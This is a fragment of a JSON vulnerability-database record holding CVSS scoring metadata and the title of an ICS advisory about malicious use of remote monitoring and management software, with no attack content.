", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 8.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2023-01-26T12:00:00", "type": "ics", "title": "Protecting Against Malicious Use of Remote Monitoring and Management Software", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPri